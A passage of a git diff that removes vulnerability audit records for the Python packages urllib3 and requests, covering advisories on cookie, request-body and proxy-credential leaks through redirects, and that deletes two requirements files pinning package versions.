- "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N"
- }
- ],
- "references": [
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"
- },
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/01220354d389cd05474713f8c982d05c9b17aafb"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "type": "WEB",
- "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "github_reviewed": true,
- "github_reviewed_at": "2023-10-02T23:27:05Z",
- "nvd_published_at": "2023-10-04T17:15:10Z",
- "severity": "MODERATE"
- }
- },
- {
- "modified": "2023-10-10T14:28:19Z",
- "published": "2023-10-04T17:15:00Z",
- "schema_version": "1.6.0",
- "id": "PYSEC-2023-192",
- "aliases": [
- "CVE-2023-43804",
- "GHSA-v845-jxx5-vc9f"
- ],
- "details": "urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "GIT",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "fixed": "01220354d389cd05474713f8c982d05c9b17aafb"
- }
- ],
- "repo": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.6"
- },
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.17"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1",
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5"
- ],
- "database_specific": {
- "source": "https://github.com/pypa/advisory-database/blob/main/vulns/urllib3/PYSEC-2023-192.yaml"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
- }
- ],
- "references": [
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "type": "ADVISORY",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"
- },
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/01220354d389cd05474713f8c982d05c9b17aafb"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"
- }
- ]
- },
- {
- "modified": "2023-10-25T18:28:34Z",
- "published": "2023-10-17T20:15:00Z",
- "schema_version": "1.6.0",
- "id": "PYSEC-2023-212",
- "aliases": [
- "CVE-2023-45803",
- "GHSA-g4mx-q9vg-27p4"
- ],
- "details": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.\n",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "GIT",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "4e98d57809dacab1cbe625fddeec1a290c478ea9"
- }
- ],
- "repo": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.7"
- },
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.18"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.17",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1",
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5",
- "2.0.6"
- ],
- "database_specific": {
- "source": "https://github.com/pypa/advisory-database/blob/main/vulns/urllib3/PYSEC-2023-212.yaml"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
- },
- {
- "type": "WEB",
- "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
- },
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
- },
- {
- "type": "ARTICLE",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
- }
- ]
- }
- ],
- "groups": [
- {
- "ids": [
- "GHSA-g4mx-q9vg-27p4",
- "PYSEC-2023-212"
- ]
- },
- {
- "ids": [
- "GHSA-v845-jxx5-vc9f",
- "PYSEC-2023-192"
- ]
- }
- ]
- }
-]
\ No newline at end of file
diff --git a/audits/torchvision-requirements.audit.json b/audits/torchvision-requirements.audit.json
index 1116a059..aaee1072 100644
--- a/audits/torchvision-requirements.audit.json
+++ b/audits/torchvision-requirements.audit.json
@@ -1,326 +1,8 @@
[
- {
- "package": {
- "name": "requests",
- "version": "2.30.0",
- "ecosystem": "PyPI",
- "commit": ""
- },
- "vulnerabilities": [
- {
- "modified": "2023-09-20T19:34:14Z",
- "published": "2023-05-22T20:36:32Z",
- "schema_version": "1.6.0",
- "id": "GHSA-j8r2-6x86-q33q",
- "aliases": [
- "CVE-2023-32681"
- ],
- "summary": "Unintended leak of Proxy-Authorization header in requests",
- "details": "### Impact\n\nSince Requests v2.3.0, Requests has been vulnerable to potentially leaking `Proxy-Authorization` headers to destination servers, specifically during redirects to an HTTPS origin. This is a product of how `rebuild_proxies` is used to recompute and [reattach the `Proxy-Authorization` header](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/sessions.py#L319-L328) to requests when redirected. Note this behavior has _only_ been observed to affect proxied requests when credentials are supplied in the URL user information component (e.g. `https://username:password@proxy:8080`).\n\n**Current vulnerable behavior(s):**\n\n1. HTTP \u2192 HTTPS: **leak**\n2. HTTPS \u2192 HTTP: **no leak**\n3. HTTPS \u2192 HTTPS: **leak**\n4. HTTP \u2192 HTTP: **no leak**\n\nFor HTTP connections sent through the proxy, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into further tunneled requests. This results in Requests forwarding the header to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate those credentials.\n\nThe reason this currently works for HTTPS connections in Requests is the `Proxy-Authorization` header is also handled by urllib3 with our usage of the ProxyManager in adapters.py with [`proxy_manager_for`](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/adapters.py#L199-L235). This will compute the required proxy headers in `proxy_headers` and pass them to the Proxy Manager, avoiding attaching them directly to the Request object. This will be our preferred option going forward for default usage.\n\n### Patches\nStarting in Requests v2.31.0, Requests will no longer attach this header to redirects with an HTTPS destination. This should have no negative impacts on the default behavior of the library as the proxy credentials are already properly being handled by urllib3's ProxyManager.\n\nFor users with custom adapters, this _may_ be potentially breaking if you were already working around this behavior. The previous functionality of `rebuild_proxies` doesn't make sense in any case, so we would encourage any users impacted to migrate any handling of Proxy-Authorization directly into their custom adapter.\n\n### Workarounds\nFor users who are not able to update Requests immediately, there is one potential workaround.\n\nYou may disable redirects by setting `allow_redirects` to `False` on all calls through Requests top-level APIs. Note that if you're currently relying on redirect behaviors, you will need to capture the 3xx response codes and ensure a new request is made to the redirect destination.\n```\nimport requests\nr = requests.get('http://github.com/', allow_redirects=False)\n```\n\n### Credits\n\nThis vulnerability was discovered and disclosed by the following individuals.\n\nDennis Brinkrolf, Haxolot (https://haxolot.com/)\nTobias Funke, (tobiasfunke93@gmail.com)",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "requests",
- "purl": "pkg:pypi/requests"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.3.0"
- },
- {
- "fixed": "2.31.0"
- }
- ]
- }
- ],
- "versions": [
- "2.10.0",
- "2.11.0",
- "2.11.1",
- "2.12.0",
- "2.12.1",
- "2.12.2",
- "2.12.3",
- "2.12.4",
- "2.12.5",
- "2.13.0",
- "2.14.0",
- "2.14.1",
- "2.14.2",
- "2.15.0",
- "2.15.1",
- "2.16.0",
- "2.16.1",
- "2.16.2",
- "2.16.3",
- "2.16.4",
- "2.16.5",
- "2.17.0",
- "2.17.1",
- "2.17.2",
- "2.17.3",
- "2.18.0",
- "2.18.1",
- "2.18.2",
- "2.18.3",
- "2.18.4",
- "2.19.0",
- "2.19.1",
- "2.20.0",
- "2.20.1",
- "2.21.0",
- "2.22.0",
- "2.23.0",
- "2.24.0",
- "2.25.0",
- "2.25.1",
- "2.26.0",
- "2.27.0",
- "2.27.1",
- "2.28.0",
- "2.28.1",
- "2.28.2",
- "2.29.0",
- "2.3.0",
- "2.30.0",
- "2.4.0",
- "2.4.1",
- "2.4.2",
- "2.4.3",
- "2.5.0",
- "2.5.1",
- "2.5.2",
- "2.5.3",
- "2.6.0",
- "2.6.1",
- "2.6.2",
- "2.7.0",
- "2.8.0",
- "2.8.1",
- "2.9.0",
- "2.9.1",
- "2.9.2"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/05/GHSA-j8r2-6x86-q33q/GHSA-j8r2-6x86-q33q.json"
- },
- "ecosystem_specific": {
- "affected_functions": [
- "requests.sessions.SessionRedirectMixin.rebuild_proxies"
- ]
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N"
- }
- ],
- "references": [
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/security/advisories/GHSA-j8r2-6x86-q33q"
- },
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32681"
- },
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/commit/74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/psf/requests"
- },
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/releases/tag/v2.31.0"
- },
- {
- "type": "WEB",
- "url": "https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2023-74.yaml"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00018.html"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AW7HNFGYP44RT3DUDQXG2QT3OEV2PJ7Y/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYASTZDGQG2BWLSNBPL3TQRL2G7QYNZ/"
- },
- {
- "type": "WEB",
- "url": "https://security.gentoo.org/glsa/202309-08"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "github_reviewed": true,
- "github_reviewed_at": "2023-05-22T20:36:32Z",
- "nvd_published_at": null,
- "severity": "MODERATE"
- }
- },
- {
- "modified": "2023-06-05T01:13:00Z",
- "published": "2023-05-26T18:15:00Z",
- "schema_version": "1.6.0",
- "id": "PYSEC-2023-74",
- "aliases": [
- "CVE-2023-32681",
- "GHSA-j8r2-6x86-q33q"
- ],
- "details": "Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.\n\n",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "requests",
- "purl": "pkg:pypi/requests"
- },
- "ranges": [
- {
- "type": "GIT",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5"
- }
- ],
- "repo": "https://github.com/psf/requests"
- },
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.3.0"
- },
- {
- "fixed": "2.31.0"
- }
- ]
- }
- ],
- "versions": [
- "2.10.0",
- "2.11.0",
- "2.11.1",
- "2.12.0",
- "2.12.1",
- "2.12.2",
- "2.12.3",
- "2.12.4",
- "2.12.5",
- "2.13.0",
- "2.14.0",
- "2.14.1",
- "2.14.2",
- "2.15.0",
- "2.15.1",
- "2.16.0",
- "2.16.1",
- "2.16.2",
- "2.16.3",
- "2.16.4",
- "2.16.5",
- "2.17.0",
- "2.17.1",
- "2.17.2",
- "2.17.3",
- "2.18.0",
- "2.18.1",
- "2.18.2",
- "2.18.3",
- "2.18.4",
- "2.19.0",
- "2.19.1",
- "2.20.0",
- "2.20.1",
- "2.21.0",
- "2.22.0",
- "2.23.0",
- "2.24.0",
- "2.25.0",
- "2.25.1",
- "2.26.0",
- "2.27.0",
- "2.27.1",
- "2.28.0",
- "2.28.1",
- "2.28.2",
- "2.29.0",
- "2.3.0",
- "2.30.0",
- "2.4.0",
- "2.4.1",
- "2.4.2",
- "2.4.3",
- "2.5.0",
- "2.5.1",
- "2.5.2",
- "2.5.3",
- "2.6.0",
- "2.6.1",
- "2.6.2",
- "2.7.0",
- "2.8.0",
- "2.8.1",
- "2.9.0",
- "2.9.1",
- "2.9.2"
- ],
- "database_specific": {
- "source": "https://github.com/pypa/advisory-database/blob/main/vulns/requests/PYSEC-2023-74.yaml"
- }
- }
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://github.com/psf/requests/security/advisories/GHSA-j8r2-6x86-q33q"
- },
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/releases/tag/v2.31.0"
- },
- {
- "type": "FIX",
- "url": "https://github.com/psf/requests/commit/74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AW7HNFGYP44RT3DUDQXG2QT3OEV2PJ7Y/"
- }
- ]
- }
- ],
- "groups": [
- {
- "ids": [
- "GHSA-j8r2-6x86-q33q",
- "PYSEC-2023-74"
- ]
- }
- ]
- },
{
"package": {
"name": "urllib3",
- "version": "2.0.2",
+ "version": "2.0.6",
"ecosystem": "PyPI",
"commit": ""
},
@@ -544,379 +226,6 @@
"severity": "MODERATE"
}
},
- {
- "modified": "2023-11-04T00:48:52Z",
- "published": "2023-10-02T23:27:05Z",
- "schema_version": "1.6.0",
- "id": "GHSA-v845-jxx5-vc9f",
- "aliases": [
- "CVE-2023-43804"
- ],
- "summary": "`Cookie` HTTP header isn't stripped on cross-origin redirects",
- "details": "urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.\n\nUsers **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.\n\n## Affected usages\n\nWe believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:\n\n* Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6)\n* Using the `Cookie` header on requests, which is mostly typical for impersonating a browser.\n* Not disabling HTTP redirects\n* Either not using HTTPS or for the origin server to redirect to a malicious origin.\n\n## Remediation\n\n* Upgrading to at least urllib3 v1.26.17 or v2.0.6\n* Disabling HTTP redirects using `redirects=False` when sending requests.\n* Not using the `Cookie` header.",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.6"
- }
- ]
- }
- ],
- "versions": [
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-v845-jxx5-vc9f/GHSA-v845-jxx5-vc9f.json"
- }
- },
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.17"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-v845-jxx5-vc9f/GHSA-v845-jxx5-vc9f.json"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N"
- }
- ],
- "references": [
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"
- },
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/01220354d389cd05474713f8c982d05c9b17aafb"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "type": "WEB",
- "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "github_reviewed": true,
- "github_reviewed_at": "2023-10-02T23:27:05Z",
- "nvd_published_at": "2023-10-04T17:15:10Z",
- "severity": "MODERATE"
- }
- },
- {
- "modified": "2023-10-10T14:28:19Z",
- "published": "2023-10-04T17:15:00Z",
- "schema_version": "1.6.0",
- "id": "PYSEC-2023-192",
- "aliases": [
- "CVE-2023-43804",
- "GHSA-v845-jxx5-vc9f"
- ],
- "details": "urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "GIT",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "fixed": "01220354d389cd05474713f8c982d05c9b17aafb"
- }
- ],
- "repo": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.6"
- },
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.17"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1",
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5"
- ],
- "database_specific": {
- "source": "https://github.com/pypa/advisory-database/blob/main/vulns/urllib3/PYSEC-2023-192.yaml"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
- }
- ],
- "references": [
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "type": "ADVISORY",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"
- },
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/01220354d389cd05474713f8c982d05c9b17aafb"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"
- }
- ]
- },
{
"modified": "2023-10-25T18:28:34Z",
"published": "2023-10-17T20:15:00Z",
@@ -1091,12 +400,6 @@
"GHSA-g4mx-q9vg-27p4",
"PYSEC-2023-212"
]
- },
- {
- "ids": [
- "GHSA-v845-jxx5-vc9f",
- "PYSEC-2023-192"
- ]
}
]
}
diff --git a/requirements/adb-enhanced-requirements.txt b/requirements/adb-enhanced-requirements.txt
deleted file mode 100644
index 1d9dff81..00000000
--- a/requirements/adb-enhanced-requirements.txt
+++ /dev/null
@@ -1 +0,0 @@
-docopt==0.6.2
diff --git a/requirements/anime-downloader-requirements.txt b/requirements/anime-downloader-requirements.txt
deleted file mode 100644
index 5953e8b6..00000000
--- a/requirements/anime-downloader-requirements.txt
+++ /dev/null
@@ -1,18 +0,0 @@
-appdirs==1.4.4
-attrs==22.1.0
-beautifulsoup4==4.11.1
-cattrs==22.2.0
-cfscrape==2.1.1
-charset-normalizer==2.1.1
-click==8.1.3
-coloredlogs==15.0.1
-fuzzywuzzy==0.18.0
-humanfriendly==10.0
-idna==3.4
-pycryptodome==3.16.0
-pySmartDL==1.3.4
-requests==2.28.1
-requests-cache==0.9.7
-soupsieve==2.3.2.post1
-url-normalize==1.4.3
-urllib3==1.26.13
